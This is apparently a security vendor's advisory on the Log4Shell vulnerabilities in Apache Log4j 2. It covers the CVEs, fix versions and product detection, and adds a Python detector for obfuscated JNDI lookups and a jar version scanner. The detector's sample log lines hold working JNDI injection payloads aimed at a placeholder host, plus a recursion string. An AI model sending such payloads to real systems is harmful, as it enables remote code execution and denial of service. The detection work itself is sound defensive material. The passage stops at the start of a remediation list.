Disclaimer: This threat is rapidly evolving by the hour. Unit 42 researchers are updating this Unit 42 blog in real time, and therefore the blog serves as our single source of truth. The information provided is for general informational purposes only.
Updated: Dec 20, 2021
Cybersecurity researchers have identified a vulnerability in Apache Log4j 2, an open-source Java logging library used by countless Java applications around the world. The vulnerability, dubbed Log4Shell, affects the 2.x line of Log4j. Log4j 2 lets developers log data from within an application and is bundled with many popular projects, including Apache Struts, Elasticsearch, and Kafka.
The flaw lies in Log4j 2's message lookup substitution. When a vulnerable version logs a string that contains a lookup such as `${jndi:ldap://host/path}`, it resolves the lookup through JNDI and connects to the server named in it. An attacker therefore only needs to get such a string into any field the application logs (an HTTP header such as User-Agent, a form parameter, a username, a chat message, or data arriving over TCP-based protocols other than HTTP) and to operate the LDAP or RMI server it points at. That attacker-controlled server answers with a reference to a Java class hosted on attacker infrastructure, which the victim JVM then downloads and executes, giving the attacker remote code execution with the privileges of the logging application.
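Because the lookup syntax is nested and recursive, attackers rarely send the plain `${jndi:...}` string; they wrap it in other lookups (`${lower:j}`, `${::-j}`, `${env:NaN:-j}`) so that a naive substring match on `jndi` misses it. The following detector, an added example that is not part of the original post or of any Palo Alto Networks product, expands those wrapper lookups the way Log4j 2 would and then checks the normalized text for a JNDI lookup and its URL scheme. The log lines are constructed, the IP addresses are documentation-range placeholders, and the expansion rules cover only the lookups commonly used for obfuscation, not every Log4j 2 lookup.

```python
import re

# An innermost lookup: ${...} whose body contains no further "$", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup and the URL scheme it targets, checked after normalization.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([A-Za-z]+)", re.IGNORECASE)


def _resolve(match):
    """Expand one innermost lookup the way Log4j 2's StrSubstitutor would for the
    lookups attackers use as obfuscation (lower:, upper:, and the ":-default"
    syntax). Every other lookup, including jndi: itself, is left as written."""
    body = match.group(1)
    prefix = body.split(":", 1)[0].lower()   # Log4j lowercases lookup prefixes
    if prefix == "jndi":
        return match.group(0)
    if ":-" in body:                          # ${key:-default} -> default, e.g. ${::-j}, ${env:NaN:-j}
        return body.split(":-", 1)[1]
    if prefix == "lower":
        return body[6:].lower()
    if prefix == "upper":
        return body[6:].upper()
    return match.group(0)                     # ctx:, date:, sys:, ... stay unresolved


def normalize(value, max_rounds=64):
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        expanded = _INNER.sub(_resolve, value)
        if expanded == value:
            return value
        value = expanded
    return value


def classify(value):
    """Return ("jndi", scheme) for a JNDI lookup, ("lookup", None) when some other
    lookup survives normalization, else (None, None)."""
    norm = normalize(value)
    hit = _JNDI.search(norm)
    if hit:
        return ("jndi", hit.group(1).lower())
    if "${" in norm:
        return ("lookup", None)
    return (None, None)


def scan(lines):
    """Return (line_no, kind, scheme, normalized_line) for every suspicious line."""
    findings = []
    for number, line in enumerate(lines, 1):
        kind, scheme = classify(line)
        if kind:
            findings.append((number, kind, scheme, normalize(line)))
    return findings


# Constructed access-log lines, not real traffic: one benign request, three
# JNDI injections in the User-Agent field (plain, lower:-obfuscated, and
# ":-default"-obfuscated with an rmi: URL), and one self-referential lookup of
# the kind CVE-2021-45105 describes.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-r}mi://203.0.113.7:1099/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-${::-$${::-j}}}}"',
]

if __name__ == "__main__":
    for number, kind, scheme, norm in scan(SAMPLE_LOGS):
        print(f"line {number}: {kind} {scheme or ''}\n    {norm}")
```

The last sample line never normalizes to a `jndi:` lookup, but it also never stops containing `${`; a request field that still holds an unresolved lookup after expansion is worth alerting on by itself, since legitimate clients do not send Log4j lookup syntax.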
CVE ID | CVSS v3.1 Score (Severity) | Mitigation
---|---|---
CVE-2021-44228 | 10.0 (Critical) | Affects Apache Log4j 2 from 2.0-beta9 through 2.14.1: JNDI lookups embedded in logged data are resolved, so an attacker-controlled string can fetch and execute remote code. Apache fixed it in Log4j 2.15.0.
CVE-2021-45046 | 9.0 (Critical) | The fix in Log4j 2.15.0 was incomplete in certain non-default configurations (a Pattern Layout with a Context Lookup such as `$${ctx:loginId}` or a Thread Context Map pattern such as `%X`), which still let attacker-controlled input reach a JNDI lookup. Log4j 2.16.0 fixes this by removing support for message lookup patterns and disabling JNDI functionality by default.
CVE-2021-45105 | 7.5 (High) | Log4j 2.16.0 did not protect against uncontrolled recursion from self-referential lookups. With the same kind of non-default Context Lookup configuration, an attacker who controls Thread Context Map data can supply a crafted string that recurses until a StackOverflowError, causing a denial of service. Fixed in Log4j 2.17.0.
At the time of writing, we have observed multiple exploits of these vulnerabilities in the wild. Customers are recommended to upgrade to the latest version (2.17.0) of Apache Log4j 2 on all systems. Note that 2.17.0 requires Java 8; Apache publishes separate fix releases on the 2.12.x line for Java 7 and the 2.3.x line for Java 6. Where an upgrade is not immediately possible, deleting the JndiLookup class from the log4j-core jar (`org/apache/logging/log4j/core/lookup/JndiLookup.class`) blocks the JNDI path behind CVE-2021-44228 and CVE-2021-45046, but does not address the recursion issue in CVE-2021-45105. For more details, read the Palo Alto Networks Unit 42 research report.
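Deciding whether a given deployment needs the upgrade means finding every copy of log4j-core, including copies nested inside WARs and fat jars, and reading its version. The scanner below is an added example, not part of the original post or of any Palo Alto Networks product. It reads the version from the Maven `pom.properties` that log4j-core jars carry (falling back to the manifest's `Implementation-Version`), maps it to the three CVEs using the fix releases listed on the Apache Log4j security page, and treats a jar whose `JndiLookup.class` has been deleted as mitigated for the two JNDI CVEs only. The sample WAR it scans is constructed in memory from stub jars that contain just those metadata entries; run it with a path argument to scan a real archive.

```python
import io
import re
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED = (".jar", ".war", ".ear", ".zip")


def _log4j_core_version(zf):
    """Version from the Maven pom.properties that log4j-core jars carry, else
    from Implementation-Version in the manifest, else None."""
    names = zf.namelist()
    sources = [(POM_PROPS, "version="), ("META-INF/MANIFEST.MF", "Implementation-Version:")]
    for name, key in sources:
        if name in names:
            for line in zf.read(name).decode("utf-8", "replace").splitlines():
                if line.startswith(key):
                    return line[len(key):].strip()
    return None


def assess(version, jndi_present):
    """Status per CVE, using the fix releases from the Apache Log4j security page:
    2.15.0 / 2.16.0 / 2.17.0 on the main line, 2.12.2 / 2.12.2 / 2.12.3 on the
    Java 7 line, 2.3.1 for all three on the Java 6 line. Every 2.0.x build is
    treated as affected. A jar whose JndiLookup.class has been deleted is
    mitigated for the two JNDI CVEs but not for CVE-2021-45105."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version or "")
    if not m or int(m.group(1)) != 2:
        return {"note": "not a parseable Log4j 2 version; treat as vulnerable"}
    minor, patch = int(m.group(2)), int(m.group(3) or 0)
    if minor == 3:
        fixed = {"CVE-2021-44228": patch >= 1, "CVE-2021-45046": patch >= 1, "CVE-2021-45105": patch >= 1}
    elif minor == 12:
        fixed = {"CVE-2021-44228": patch >= 2, "CVE-2021-45046": patch >= 2, "CVE-2021-45105": patch >= 3}
    else:
        fixed = {"CVE-2021-44228": minor >= 15, "CVE-2021-45046": minor >= 16, "CVE-2021-45105": minor >= 17}
    status = {}
    for cve, ok in fixed.items():
        if ok:
            status[cve] = "fixed"
        elif cve != "CVE-2021-45105" and not jndi_present:
            status[cve] = "mitigated (JndiLookup.class removed)"
        else:
            status[cve] = "VULNERABLE"
    return status


def scan_archive(data, path, findings=None):
    """Walk an archive and every archive nested in it (WEB-INF/lib, fat jars);
    report each log4j-core found with its version and JndiLookup status."""
    findings = [] if findings is None else findings
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if POM_PROPS in names or JNDI_CLASS in names:
            jndi = JNDI_CLASS in names
            version = _log4j_core_version(zf)
            findings.append({"path": path, "version": version, "jndi_lookup": jndi,
                             "status": assess(version, jndi)})
        for name in names:
            if name.lower().endswith(NESTED):
                scan_archive(zf.read(name), f"{path}!/{name}", findings)
    return findings


def build_sample_war():
    """Constructed test data, not real artifacts: a WAR bundling three stub
    log4j-core jars (2.14.1 as shipped, 2.14.1 with JndiLookup.class deleted,
    and 2.17.0), each carrying only the metadata entries the scanner reads."""
    def stub_core(version, with_jndi):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
            zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
            if with_jndi:
                zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
        return buf.getvalue()

    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", stub_core("2.14.1", True))
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1-nojndi.jar", stub_core("2.14.1", False))
        zf.writestr("WEB-INF/lib/log4j-core-2.17.0.jar", stub_core("2.17.0", True))
    return war.getvalue()


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                       # scan a real jar/war/ear from disk
        with open(sys.argv[1], "rb") as fh:
            findings = scan_archive(fh.read(), sys.argv[1])
    else:                                       # demo on the constructed WAR
        findings = scan_archive(build_sample_war(), "app.war")
    for f in findings:
        print(f["path"], f["version"], "JndiLookup present" if f["jndi_lookup"] else "JndiLookup removed", f["status"])
```

A shaded or repackaged jar may drop `pom.properties`; the scanner still reports it if `JndiLookup.class` is present, with an unknown version that should be treated as vulnerable until confirmed otherwise.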
Palo Alto Networks IoT Security helps identify IoT devices and IoT device management servers where CVE-2021-44228, CVE-2021-45046, or CVE-2021-45105 are being exploited based on specific indicators of compromise or behavior observed in network traffic. Using machine learning and AI, IoT Security leverages anonymized cross-tenant data to create device profiles and behavioral models. It then uses its patented anomaly-detection mechanisms to distinguish deviations from normal network behavior. Such deviations can include, for example, a sudden appearance of traffic from a new source, an unusually high number of connections, or an inexplicable surge of certain attributes appearing in IoT application payloads. Finally, IoT Security generates alerts to notify administrators of the detected anomalous or suspicious behavior, explains if it’s indicative of known vulnerabilities, calls out security implications, and suggests actions to take to remediate the threat.
When IoT Security determines the identity of an IoT device, and specifically the libraries it uses, it can alert you if the device is running an affected Apache Log4j library. If so, it displays a vulnerability alert in the IoT Security portal so you can take further action, such as applying a firmware or software update from the vendor that ships a fixed version of the library.
In addition, wherever applicable, IoT Security can work with other Palo Alto Networks security products such as WildFire, DNS Security, and Threat Prevention to provide more comprehensive protection of your devices. For example, Threat Prevention has specific detections to identify the CVE exploits related to the Log4j 2 vulnerabilities. Once identified, Threat Prevention can block any attempts to exploit these vulnerabilities.
If you find any device that is vulnerable to these CVEs or exhibiting anomalous behavior, or if you receive a security alert, consider taking the following actions: